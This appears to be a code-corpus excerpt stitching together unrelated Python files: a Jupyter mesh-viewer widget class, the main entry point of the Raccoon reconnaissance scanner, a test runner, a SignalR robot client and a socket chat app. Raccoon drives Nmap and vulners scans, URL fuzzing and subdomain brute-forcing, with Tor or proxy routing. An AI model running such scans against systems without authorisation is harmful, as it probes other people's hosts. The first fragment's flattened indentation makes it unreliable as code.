x_range = self.mesh.bbox[0][0], self.mesh.bbox[1][0]
x_step = abs(x_range[0]-x_range[1])/100
self.clipping_slider_x = widgets.FloatRangeSlider(
value=x_range,
min=x_range[0]-x_step,
max=x_range[1]+x_step,
step=x_step,
description='X Clipping:',
disabled=False,
continuous_update=True,
orientation='horizontal',
readout=True,
readout_format=".1f",
layout=self.slider_layout
)
y_range = self.mesh.bbox[0][1], self.mesh.bbox[1][1]
y_step = abs(y_range[0]-y_range[1])/100
self.clipping_slider_y = widgets.FloatRangeSlider(
value = y_range,
min=y_range[0]-y_step,
max=y_range[1]+y_step,
step=y_step,
description='Y Clipping:',
disabled=False,
continuous_update=True,
orientation='horizontal',
readout=True,
readout_format=".1f",
layout=self.slider_layout
)
z_range = self.mesh.bbox[0][2], self.mesh.bbox[1][2]
z_step = abs(z_range[0]-z_range[1])/100
self.clipping_slider_z = widgets.FloatRangeSlider(
value = z_range,
min = z_range[0]-z_step,
max = z_range[1]+z_step,
step=z_step,
description='Z Clipping:',
disabled=False,
continuous_update=True,
orientation='horizontal',
readout=True,
readout_format=".1f",
layout=self.slider_layout
)
self.wireframe_opacity_slider = widgets.FloatSlider(
value=0.4,
min=0.,
max=1.,
step=0.1,
continuous_update=True,
readout_format=".1f",
description = 'Wireframe',
disable = False,
)
self.color_wireframe = widgets.ColorPicker(
concise=True,
value=self.drawable.wireframe.material.color,
disabled=False,
layout={'margin': '0 0 0 10px'}
)
self.enable_picking_button = widgets.ToggleButton(
value=False,
description='Show Picking Info',
disabled=False,
button_style='info', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Enable the picking functionality',
layout=self.picking_info_layout
)
self.picking_label = widgets.Label(
llayout=self.invisible_layout,
disabled=False,
continuous_update=True
)
tab_titles = ['Poly', 'Vertex']
children = [
widgets.HTML(
value="",
layout={'width': '100','margin': '50 0 0 0'},
disabled=False,
continuous_update=True
) for title in tab_titles]
self.picking_tab = widgets.Tab(layout=self.invisible_layout,
disabled=True,
width=300,
height=400)
self.picking_tab.children = children
for i in range(len(children)):
self.picking_tab.set_title(i, tab_titles[i])
self.color_picking_label = widgets.Label(
value="Click Color ",
layout=self.invisible_layout,
disabled=False,
continuous_update=True
)
self.color_map = widgets.Dropdown(
options=[(i, idx) for idx, i in enumerate(ColorMap.color_maps.keys())],
value=0,
description='Color-Map:',
layout = self.invisible_layout,
)
self.widgets += [self.color_map]
self.metric_menu = widgets.Dropdown(
options= [(i, idx) for idx, i in enumerate(self.mesh.simplex_metrics.keys())],
value=0,
description='Metric:',
layout = self.invisible_layout,
)
self.widgets += [self.metric_menu]
self.coloring_type_menu = widgets.Dropdown(
options=[('Default', 0), ('Simplex Quality', 1), ('Label',2)],
value=0,
description='Color Type:',
)
self.widgets += [
widgets.HBox([
widgets.VBox([
widgets.HBox([
self.clipping_slider_x, self.flip_x_button
]),
widgets.HBox([
self.clipping_slider_y, self.flip_y_button
]),
widgets.HBox([
self.clipping_slider_z, self.flip_z_button
]),
widgets.HBox([
self.wireframe_opacity_slider, self.color_wireframe
]),
widgets.HBox([
self.coloring_type_menu
]),
widgets.VBox([
widgets.HBox(
[
self.enable_picking_button
]
),
widgets.HBox([
self.picking_label
]),
widgets.HBox([
self.picking_tab
]),
])
]),
]),
]
mesh_colors = []
if hasattr(self.mesh, "internals"):
self.color_internal = widgets.ColorPicker(
concise=True,
description='Internal',
value=colors.rgb2hex(self.drawable._internal_color),
disabled=False,
)
mesh_colors += [self.color_internal]
self.color_picking = widgets.ColorPicker(
concise=True,
description="Click Color",
value=colors.rgb2hex(colors.purple),
layout = self.invisible_layout,
disabled=False,
)
self.color_external = widgets.ColorPicker(
concise=True,
description='External',
value=colors.rgb2hex(self.drawable._external_color),
disabled=False,
)
mesh_colors += [self.color_external]
mesh_colors += [self.color_picking]
self.widgets += [widgets.HBox(mesh_colors)]
self.color_label_pickers = [widgets.ColorPicker(
concise=True,
description='Label ' + str(i),
value= colors.random_color(return_hex=True),
disabled=False,
layout = self.visible_layout,
) for i in np.unique(self.mesh.labels)]
self.color_label_pickers = widgets.HBox(self.color_label_pickers, layout=self.invisible_layout)
self.widgets += [self.color_label_pickers]
self.flip_x_button.observe(self.__update_clipping, names='value')
self.flip_y_button.observe(self.__update_clipping, names='value')
self.flip_z_button.observe(self.__update_clipping, names='value')
self.clipping_slider_x.observe(self.__update_clipping, names='value')
self.clipping_slider_y.observe(self.__update_clipping, names='value')
self.clipping_slider_z.observe(self.__update_clipping, names='value')
if hasattr(self.mesh, "internals"):
self.color_internal.observe(self.__update_internal_color, names='value')
self.color_external.observe(self.__update_external_color, names='value')
self.color_wireframe.observe(self.__update_wireframe_color, names='value')
self.wireframe_opacity_slider.observe(self.__update_wireframe_opacity, names='value')
self.coloring_type_menu.observe(self.__change_color_type, names='value')
self.color_map.observe(self.__change_color_map, names='value')
self.metric_menu.observe(self.__change_metric, names='value')
self.enable_picking_button.observe(self.__toggle_picking, names='value')
self.click_picker.observe(self.on_click, names=['point'])
[i.observe(self.__change_color_label,names='value') for i in self.color_label_pickers.children]
def __update_wireframe_color(self, change):
self.drawable.update_wireframe_color(self.color_wireframe.value)
def __update_wireframe_opacity(self, change):
self.drawable.update_wireframe_opacity(self.wireframe_opacity_slider.value)
def __update_internal_color(self, change):
if hasattr(self.mesh, "internals"):
self.drawable.update_internal_color(colors.hex2rgb(self.color_internal.value))
def __update_external_color(self, change):
self.drawable.update_external_color(colors.hex2rgb(self.color_external.value))
    def __change_color_type(self, change):
        """Show/hide the widgets relevant to the selected coloring mode and
        trigger the matching recoloring of the drawable.

        Menu values: 0 = default internal/external colors, 1 = simplex-quality
        color map, 2 = per-label colors.
        """
        if self.coloring_type_menu.value == 0:
            # Default: plain internal/external colors.
            self.color_map.layout = self.invisible_layout
            self.metric_menu.layout = self.invisible_layout
            self.color_external.layout = self.visible_layout
            if hasattr(self.mesh, "internals"):
                self.color_internal.layout = self.visible_layout
            self.color_label_pickers.layout = self.invisible_layout
            # Clear any map/label coloring before repainting the flat colors.
            self.drawable._label_colors = None
            self.drawable._color_map = None
            self.__update_external_color(None)
            self.__update_internal_color(None)
        elif self.coloring_type_menu.value == 1:
            # Simplex quality: metric-driven color map.
            self.color_map.layout = self.visible_layout
            self.metric_menu.layout = self.visible_layout
            self.color_external.layout = self.invisible_layout
            if hasattr(self.mesh, "internals"):
                self.color_internal.layout = self.invisible_layout
            self.color_label_pickers.layout = self.invisible_layout
            self.drawable._label_colors = None
            self.__change_color_map(None)
        elif self.coloring_type_menu.value == 2:
            # Label: one color per mesh label.
            self.color_external.layout = self.invisible_layout
            if hasattr(self.mesh, "internals"):
                self.color_internal.layout = self.invisible_layout
            self.color_map.layout = self.invisible_layout
            self.metric_menu.layout = self.invisible_layout
            if self.mesh.labels is not None:
                self.color_label_pickers.layout = self.visible_layout
            self.__change_color_label(None)
def __initialize_picker(self):
pickable_objects = self.drawable.mesh
picker = three.Picker(controlling=pickable_objects, event='click')
return picker
    def __change_metric(self, change):
        """Recompute the color map whenever the quality-metric selection changes."""
        self.__change_color_map(None)
def __change_color_label(self, change):
self.drawable._label_colors = {int(i.description.split()[1]): colors.hex2rgb(i.value) for i in self.color_label_pickers.children}
self.drawable.update_color_label()
def __change_color_map(self, change):
metric_string = list(self.mesh.simplex_metrics.keys())[self.metric_menu.value]
c_map_string = list(ColorMap.color_maps.keys())[self.color_map.value]
self.drawable.compute_color_map(metric_string, c_map_string)
    def __clipping_updater(self):
        """Apply the current slider/flip widget values to the mesh clipping.

        Runs on a worker thread (started by __update_clipping).  The
        __dont_update_clipping flag suppresses concurrent updates; if another
        update request arrived while this one ran (__clipping_in_queue), it is
        replayed exactly once at the end.
        """
        self.__dont_update_clipping = True
        flip_x = self.flip_x_button.value
        flip_y = self.flip_y_button.value
        flip_z = self.flip_z_button.value
        min_x, max_x = self.clipping_slider_x.value
        min_y, max_y = self.clipping_slider_y.value
        min_z, max_z = self.clipping_slider_z.value
        self.mesh.set_clipping(min_x = min_x, max_x = max_x,
                               min_y = min_y, max_y = max_y,
                               min_z = min_z, max_z = max_z,
                               flip_x = flip_x, flip_y = flip_y, flip_z = flip_z)
        if self.__clipping_in_queue:
            # A request was queued while we were clipping: run it once more.
            self.__clipping_in_queue = False
            self.__dont_update_clipping = False
            self.__update_clipping(None)
        else:
            self.__dont_update_clipping = False
def on_click(self, change):
if not self.enable_picking_button.value:
return
geometry_type = str(type(self.drawable.geometry))
# if nothing is clicked
if change.owner.object is None:
self.picking_label.value = "Nothing found"
self.picking_tab.children[0].value = ' '
self.picking_tab.children[1].value = ' '
else:
# click_operations is called based on the number of triangles per poly of the geometry
if "Quadmesh" in geometry_type:
self.click_operations(change, 2)
elif "Tetmesh" in geometry_type:
self.click_operations(change, 4)
elif "Hexmesh" in geometry_type:
self.click_operations(change, 12)
else:
# Trimesh
self.click_operations(change, 1)
    def click_operations(self, change, num_triangles):
        """React to a click on the mesh: highlight the picked polygon and fill
        the picking info tabs.

        num_triangles is the number of rendered triangles per polygon
        (1 = Trimesh, 2 = Quadmesh, 4 = Tetmesh, 12 = Hexmesh); the rendered
        face index divided by it yields the polygon index.
        """
        poly_index = change.owner.faceIndex // num_triangles
        coords = change['new']
        internal = False
        if num_triangles <= 2:
            # Surface meshes: the face index maps directly onto polys.
            vertices = np.array(self.drawable.geometry.polys[poly_index]).astype("int32")
        elif num_triangles == 4:
            # Volumetric meshes: remap through _map_poly_indices because only
            # visible polys are rendered.
            poly_index = poly_index + self.drawable.geometry._map_poly_indices[poly_index]
            if self.drawable.geometry.internals[poly_index]:
                internal = True
            vertices = np.array(self.drawable.geometry.polys[poly_index]).astype("int32")
        else:
            poly_index = poly_index + self.drawable.geometry._map_poly_indices[poly_index]
            if self.drawable.geometry.internals[poly_index]:
                internal = True
            vertices = np.array(self.drawable.geometry.polys[poly_index]).astype("int32")
        vertex_coords = np.array([self.drawable.geometry.vertices[vrtx] for vrtx in vertices]).astype("float32")
        nearest_vertex, nearest_vertex_coords = self.find_nearest_vertex(vertices, vertex_coords, change.owner.point)
        nearest_faces = np.array(self.drawable.geometry.adj_vtx2poly[nearest_vertex]).astype("int32")
        if self.old_picked_face is not None:
            # Restore the previous highlight before painting the new one.
            self.__change_color_type(None)
        self.old_picked_face = poly_index
        self.old_picked_face_internal = internal
        # [self.drawable.update_external_color(colors.hex2rgb(self.color_picking.value), poly_index=triangle, geometry=None) for triangle in triangles]
        self.drawable.update_poly_color(colors.hex2rgb(self.color_picking.value), poly_index=poly_index,num_triangles=num_triangles)
        self.picking_label.value = 'Clicked on (%.3f, %.3f, %.3f)' % tuple(coords)
        # Tab 0: polygon info; Tab 1: nearest-vertex info.
        self.picking_tab.children[0].value = 'Poly index: %d' % poly_index + '<br>'
        self.picking_tab.children[0].value += 'Vertex indices: '
        self.picking_tab.children[0].value += ', '.join([str(v) for v in vertices]) + '<br>'
        self.picking_tab.children[0].value += ''.join(
            'Vertex ' + str(a) + ' coords: (%.3f, %.3f, %.3f)' % tuple(b) + '<br>' for a, b in
            zip(vertices, vertex_coords))
        self.picking_tab.children[1].value = 'Vertex index: %d' % nearest_vertex + '<br>'
        self.picking_tab.children[1].value += 'Vertex coords: (%.3f, %.3f, %.3f)' % tuple(nearest_vertex_coords) + '<br>'
        self.picking_tab.children[1].value += 'Nearest Polys: '
        self.picking_tab.children[1].value += ', '.join([str(v) for v in nearest_faces]) + '<br>'
def __toggle_picking(self, change):
if self.enable_picking_button.value:
self.picking_tab.layout = {'margin': '0 0 0 20px'}
self.picking_label.layout = {'margin': '0 0 0 20px'}
self.enable_picking_button.description = 'Hide Picking Info'
self.color_picking.layout = self.visible_layout
else:
self.picking_tab.layout = self.invisible_layout
self.picking_label.layout = self.invisible_layout
self.color_picking.layout = self.invisible_layout
self.enable_picking_button.description = 'Show Picking Info'
self.__change_color_type(None)
def __update_clipping(self, change):
if self.__dont_update_clipping:
self.__clipping_in_queue = True
else:
thread = threading.Thread(target=self.__clipping_updater, args=())
thread.daemon = True
thread.start()
def update(self):
clipping = self.mesh.clipping
flips = clipping.flip
flip_x = flips.x
flip_y = flips.y
flip_z = flips.z
x_range = clipping.min_x, clipping.max_x
y_range = clipping.min_y, clipping.max_y
z_range = clipping.min_z, clipping.max_z
self.flip_x_button.value = flip_x
self.flip_y_button.value = flip_y
self.flip_z_button.value = flip_z
self.clipping_slider_x.value = x_range
self.clipping_slider_y.value = y_range
self.clipping_slider_z.value = z_range
@staticmethod
def find_nearest_vertex(vertexes, vertex_coords, click_coords):
dist = [np.linalg.norm(click_coords - vertex) for vertex in vertex_coords]
return vertexes[dist.index(min(dist))], vertex_coords[dist.index(min(dist))] |
main.py | import time
import asyncio
import threading
import click
import sys
import os
# Python imports will be the end of us all
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
# Absolute directory of this module; used to locate bundled wordlists/scripts.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
def intro(logger):
    """Print the Raccoon ASCII-art banner (in gray) through the given logger."""
    logger.info("""{}
 _____                _____    _____    ____     ____    _   _
|  __ \      /\      / ____|  / ____|  / __ \   / __ \  | \ | |
| |__) |    /  \    | |      | |      | |  | | | |  | | |  \| |
|  _  /    / /\ \   | |      | |      | |  | | | |  | | | . ` |
| | \ \   / ____ \  | |____  | |____  | |__| | | |__| | | |\  |
|_|  \_\ /_/    \_\  \_____|  \_____|  \____/   \____/  |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
    """.format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.1")
@click.option("-t", "--target", required=True, help="Target to scan")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
              help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
              " Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
              " A proxy from the list will be chosen at random for each request."
              " Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
              "Should be in the form of key:value\n"
              "Example: PHPSESSID:12345,isMobile:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "wordlists/fuzzlist"),
              help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
              help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
              help="Comma separated list of HTTP status code to ignore for fuzzing."
              " Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "wordlists/subdomains"),
              help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "vulners_nse/vulners.nse"),
              help="Path to the nmap_vulners.nse script.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
              help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
#               help="Min and Max number of seconds of delay to be waited between requests\n"
#                    "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
              help="Directory destination for scan output")
def main(target,
         tor_routing,
         proxy_list,
         proxy,
         cookies,
         dns_records,
         wordlist,
         threads,
         ignored_response_codes,
         subdomain_list,
         full_scan,
         scripts,
         services,
         port,
         vulners_nmap_scan,
         vulners_path,
         tls_port,
         skip_health_check,
         follow_redirects,
         no_url_fuzzing,
         no_sub_enum,
         skip_nmap_scan,
         # delay,
         outdir,
         quiet):
    """Raccoon entry point: validate CLI arguments, then orchestrate the scans.

    Flow: arg validation -> optional Tor/proxy setup -> host parsing ->
    background Nmap thread -> async TLS/WAF/DNS/web checks -> URL fuzzing and
    subdomain enumeration -> wait for Nmap to finish.  Each failure mode exits
    with a distinct non-zero code.
    """
    try:
        # ------ Arg validation ------
        # Set logging level and Logger instance
        log_level = HelpUtilities.determine_verbosity(quiet)
        logger = SystemOutLogger(log_level)
        intro(logger)
        target = target.lower()
        try:
            HelpUtilities.validate_executables()
        except RaccoonException as e:
            logger.critical(str(e))
            exit(9)
        HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
        HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
        HelpUtilities.create_output_directory(outdir)
        if tor_routing:
            logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
        elif proxy_list:
            if proxy_list and not os.path.isfile(proxy_list):
                raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
            else:
                logger.info("{} Routing traffic using proxies from list {}\n".format(
                    COLORED_COMBOS.NOTIFY, proxy_list))
        elif proxy:
            logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
        # TODO: Sanitize delay argument
        dns_records = tuple(dns_records.split(","))
        ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
        if port:
            HelpUtilities.validate_port_range(port)
        # ------ /Arg validation ------
        if cookies:
            try:
                cookies = HelpUtilities.parse_cookie_arg(cookies)
            except RaccoonException as e:
                logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
                exit(2)
        # Set Request Handler instance
        # NOTE(review): request_handler is never referenced again below;
        # presumably RequestHandler is a singleton the scanners reuse — confirm.
        request_handler = RequestHandler(
            proxy_list=proxy_list,
            tor_routing=tor_routing,
            single_proxy=proxy,
            cookies=cookies
        )
        if tor_routing:
            try:
                HelpUtilities.confirm_traffic_routs_through_tor()
                logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
                    COLORED_COMBOS.NOTIFY))
            except RaccoonException as err:
                print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
                exit(3)
        main_loop = asyncio.get_event_loop()
        logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
        logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
        # TODO: Populate array when multiple targets are supported
        # hosts = []
        try:
            host = Host(target=target, dns_records=dns_records)
            host.parse()
        except HostHandlerException as e:
            logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
            exit(11)
        if not skip_health_check:
            try:
                HelpUtilities.validate_target_is_up(host)
            except RaccoonException as err:
                logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
                exit(42)
        # Nmap runs on its own thread since it can take far longer than the
        # async checks below.
        if not skip_nmap_scan:
            if vulners_nmap_scan:
                logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
                nmap_vulners_scan = NmapVulnersScan(host, port, vulners_path)
                nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
                # Run NmapVulners scan in the background
                nmap_thread.start()
            else:
                logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
                nmap_scan = NmapScan(host, full_scan, scripts, services, port)
                # # # TODO: Populate array when multiple targets are supported
                # nmap_threads = []
                nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
                # Run Nmap scan in the background. Can take some time
                nmap_thread.start()
        # Run first set of checks - TLS, Web/WAF Data, DNS data
        waf = WAF(host)
        tls_info_scanner = TLSHandler(host, tls_port)
        web_app_scanner = WebApplicationScanner(host)
        tasks = (
            asyncio.ensure_future(tls_info_scanner.run()),
            asyncio.ensure_future(waf.detect()),
            asyncio.ensure_future(DNSHandler.grab_whois(host)),
            asyncio.ensure_future(web_app_scanner.run_scan()),
            asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
        )
        main_loop.run_until_complete(asyncio.wait(tasks))
        # Second set of checks - URL fuzzing, Subdomain enumeration
        if not no_url_fuzzing:
            fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
            main_loop.run_until_complete(fuzzer.fuzz_all())
        if not host.is_ip:
            sans = tls_info_scanner.sni_data.get("SANs")
            subdomain_enumerator = SubDomainEnumerator(
                host,
                domain_list=subdomain_list,
                sans=sans,
                ignored_response_codes=ignored_response_codes,
                num_threads=threads,
                follow_redirects=follow_redirects,
                no_sub_enum=no_sub_enum
            )
            main_loop.run_until_complete(subdomain_enumerator.run())
        if not skip_nmap_scan:
            if nmap_thread.is_alive():
                logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
                            "Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
                # Poll until the background Nmap thread finishes.
                while nmap_thread.is_alive():
                    time.sleep(15)
        logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
        os.system("stty sane")
    except KeyboardInterrupt:
        print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
        # Fix F'd up terminal after CTRL+C
        os.system("stty sane")
        exit(42)
# Script entry point: run the click-decorated CLI.
if __name__ == "__main__":
    main()
|
TestSuite.py | import logging
from .server import server
from threading import Thread
import time
_Tests = []
def test(func):
    """register function to test suite"""
    # NOTE: returns None, so if used as a @test decorator the decorated name
    # ends up bound to None; the _Test record still holds the original func.
    _Tests.append(_Test(func))
def rerun():
    """Rebuild every registered test in a fresh state and run them all again."""
    global _Tests
    # Re-wrap each original function so status/elapsed are reset.
    _Tests = [_Test(t.function) for t in _Tests]
    runTests()
def runTests():
    """Start every registered test on its own daemon-less thread."""
    for case in _Tests:
        Thread(target=case.run).start()
def run():
    """Run the test suite"""
    # Start the reporting web server on its own thread, then launch the tests.
    print("Test Suite runner called")
    thread = Thread(target=server.start) # Python threads
    thread.start()
    runTests()
def getTests():
    """Return the list of registered _Test records."""
    return _Tests
class _Test():
WAITING = "Queued"
RUNNING = "Running"
SKIP = "Skipped"
PASS = "Passed"
FAIL = "Failed"
def __init__(self, function):
self.function = function
self.name = function.__name__
self.status = self.WAITING
self.elapsed = 0
def __repr__(self):
return f"{self.name} : {self.status} in {self.elapsed:.4f}"
def run(self):
self.status = self.RUNNING
start_time = time.perf_counter()
try:
self.function()
self.status = self.PASS
except AssertionError:
logging.error(
"There is an error in test:", exc_info=True)
self.status = self.FAIL
finally:
end_time = time.perf_counter()
self.elapsed = end_time-start_time
|
app2.py | import logging
import time
import json
from threading import Timer, Thread
from requests import Session
from signalr import Connection
import breezy_robot_handler
logging.basicConfig(level=logging.DEBUG)
# Singleton robot-hardware interface shared by every handler below.
RHANDLER = breezy_robot_handler.RobotHandler()
def signal_r_setup():
    """Connect to the SignalR hub, register the bot, and pump control messages.

    Blocks forever on connection.wait(None).  Telemetry is pushed from a
    daemon thread every 5 seconds; a Timer watchdog stops the robot shortly
    after the last movement command.
    """
    with Session() as session:
        # create a connection
        #connection = Connection("https://atbot01.azurewebsites.net/signalr", session)
        connection = Connection("https://dube.azurewebsites.net/signalr", session)
        #connection = Connection("http://localhost:6658/signalr", session)
        # get control hub
        bot = connection.register_hub('BotControl')
        hub = connection.register_hub('WebRtcHub')
        # start a connection
        connection.start()
        # Watchdog: stops the robot if no new command re-arms it.
        t = Timer(.1, RHANDLER.stop)
        hub.server.invoke('registerBot', 'PyBot')
        print('connected to SignalR hub... connection id: ' + connection.token)

        # create new control message handler
        def handle_bot_control_request(data):
            # Bug fix: this function rebinds `t`, which made `t` local —
            # `t.cancel()` raised UnboundLocalError on every message without
            # the nonlocal declaration.
            nonlocal t
            print('received: ', data)
            try:
                command = data['Command']
                #RHANDLER.get_sensors()
                if command == "turn":
                    RHANDLER.turn(data)
                elif command == "rise":
                    RHANDLER.rise(data)
                else:
                    #RHANDLER.go(data)
                    RHANDLER.go_direct(data)
                # Re-arm the stop watchdog after each movement command.
                t.cancel()
                t = Timer(0.50, RHANDLER.stop)
                t.start()
            except Exception:
                # Best-effort: a malformed message must not kill the handler.
                # (Was a bare `except:`, which also swallowed SystemExit.)
                pass

        def send_telemetry():
            # Periodically push sensor readings to the hub.
            while True:
                j = RHANDLER.get_sensors()
                bot.server.invoke('sendBotTelemetry', j)
                time.sleep(5)

        # receive new chat messages from the hub
        bot.client.on('controllerAt', handle_bot_control_request)
        telemetry_thread = Thread(target=send_telemetry, daemon=True)
        telemetry_thread.start()

        # create error handler
        def print_error(error):
            print('error: ', error)
        # process errors
        connection.error += print_error
        # wait before exit
        connection.wait(None)
if __name__ == '__main__':
    # Initialize the robot hardware before opening the SignalR connection.
    RHANDLER.init_bot()
    signal_r_setup()
|
chat-app.py | import socket
import sys
import argparse
import threading
# set default values
address = "127.0.0.1"   # bind/connect address
port = 4444             # TCP port
username = "Me"         # local display name
othername = "Received"  # remote display name (replaced after the handshake)
def recv_data_thread(socketObj):
    """Receive loop: print incoming messages until the connection closes.

    Runs on its own thread; module globals `username`/`othername` hold the
    display names negotiated during the handshake.
    """
    while True:
        try:
            data = socketObj.recv(1024)
        except ConnectionResetError:
            # Peer vanished without a clean shutdown.
            if othername != "Received":
                print(f"\nClosed by {othername}")
            else:
                print("\nClosed by other user.")
            break
        except ConnectionAbortedError:
            # Our own side closed the socket.
            print(f"\nConnection closed by {username.lower()}.")
            break
        else:
            print(f"\n{othername}: {data.decode()}\n{username}: ", end="")
    socketObj.close()
    print("Program Exited")
    sys.exit()
def server_func(address, port, username):
    """Run the chat server: accept one client, swap usernames, then chat.

    Sends our username, receives the peer's, starts the receive thread, and
    loops reading stdin to send messages until interrupted.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((address, port))
        s.listen()
        print("\nServer address: " + address )
        print("Server listening port: " + str(port))
        print("\nWaiting for connection from client ...")
        try :
            conn, addr = s.accept()
        except KeyboardInterrupt:
            print("\nProgram exited.")
            s.close()
            sys.exit()
        except :
            print("\nError")
            s.close()
            sys.exit()
        else:
            print("\nConnected client IP: " + addr[0])
            print("Connected client port: " + str(addr[1]))
            print()
            # Handshake: exchange display names with the client.
            conn.send(bytes(username, encoding="UTF-8"))
            global othername
            othername = conn.recv(1024)
            othername = othername.decode()
            if othername=="Me":
                # Both sides defaulting to "Me" would be ambiguous.
                othername="Received"
            recv_ = threading.Thread(target=recv_data_thread, args=(conn,))
            recv_.start()
            # Send loop: read stdin and forward to the client.
            while True:
                try:
                    print(f"{username}: ", end="")
                    to_send = input()
                    conn.send(bytes(to_send, encoding="UTF-8"))
                except KeyboardInterrupt:
                    print("\nProgam Exited.")
                    conn.close()
                    s.close()
                    sys.exit()
                except:
                    conn.close()
                    s.close()
                    sys.exit()
        # NOTE(review): if accept() failed, `conn` is unbound here and this
        # finally raises NameError (masked by the outer bare except) — confirm.
        finally:
            conn.close()
    except KeyboardInterrupt:
        print("\nProgam Exited.")
        sys.exit()
    except:
        sys.exit()
    finally:
        s.close()
def client_func(address, port, username):
    """Run the chat client: connect to the server, swap usernames, then chat."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((address, port))
        print("\nConnected Server IP: " + address)
        print("Connected Server port: " + str(port))
        print()
        # Handshake: the server sends its name first, then we send ours.
        global othername
        othername = s.recv(1024)
        othername = othername.decode()
        if othername=="Me":
            # Both sides defaulting to "Me" would be ambiguous.
            othername="Received"
        s.send(bytes(username, encoding="UTF-8"))
        recv_ = threading.Thread(target=recv_data_thread, args=(s,))
        recv_.start()
        # Send loop: read stdin and forward to the server.
        while True:
            try:
                print(f"{username}: ",end="")
                to_send=input()
                s.send(bytes(to_send, encoding="UTF-8"))
            except KeyboardInterrupt:
                print("\nProgam Exited.")
                s.close()
                sys.exit()
            except:
                s.close()
                sys.exit()
    except KeyboardInterrupt:
        print("\nProgam Exited.")
        sys.exit()
    except:
        sys.exit()
    finally:
        s.close()
# Script entry point: parse CLI flags and start in server or client mode.
if __name__=="__main__":
    parser = argparse.ArgumentParser(description="Simple Chat Program.")
    parser.add_argument("--server", help="Create a server", action="store_true")
    parser.add_argument("--client", help="Create a client", action="store_true")
    parser.add_argument("-i", "--ipaddress", help="IP address (Default: 127.0.0.1)")
    # Bug fix: help text read "Por number".
    parser.add_argument("-p", "--port", help="Port number (Default: 4444)")
    parser.add_argument("-u", "--username", help="The name used during connection")
